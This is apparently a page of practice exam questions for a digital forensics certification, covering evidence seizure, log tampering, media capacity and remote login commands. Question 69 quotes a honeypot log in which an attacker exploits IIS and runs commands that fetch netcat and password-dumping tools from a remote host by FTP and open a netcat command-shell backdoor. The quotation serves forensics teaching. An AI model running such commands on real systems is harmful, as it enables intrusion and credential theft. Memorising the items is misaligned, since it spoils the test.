312-49v10 Exam Question 66

Debbie has obtained a warrant to search a known pedophiles house. Debbie went to the house and executed the search warrant to seize digital devices that have been recorded as being used for downloading Illicit Images. She seized all digital devices except a digital camer a. Why did she not collect the digital camera?
  • 312-49v10 Exam Question 67

    Sally accessed the computer system that holds trade secrets of the company where she Is employed. She knows she accessed It without authorization and all access (authorized and unauthorized) to this computer Is monitored.To cover her tracks. Sally deleted the log entries on this computer. What among the following best describes her action?
  • 312-49v10 Exam Question 68

    A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The problem is that the data is around 42GB in size. What type of removable media could the investigator use?
  • 312-49v10 Exam Question 69

    The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
    He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
    "cmd1.exe /c open 213.116.251.162 >ftpcom"
    "cmd1.exe /c echo johna2k >>ftpcom"
    "cmd1.exe /c echo haxedj00 >>ftpcom"
    "cmd1.exe /c echo get nc.exe >>ftpcom"
    "cmd1.exe /c echo get pdump.exe >>ftpcom"
    "cmd1.exe /c echo get samdump.dll >>ftpcom"
    "cmd1.exe /c echo quit >>ftpcom"
    "cmd1.exe /c ftp -s:ftpcom"
    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
    What can you infer from the exploit given?
  • 312-49v10 Exam Question 70

    Which of the following commands shows you the username and IP address used to access the system via a remote login session and the type of client from which they are accessing the system?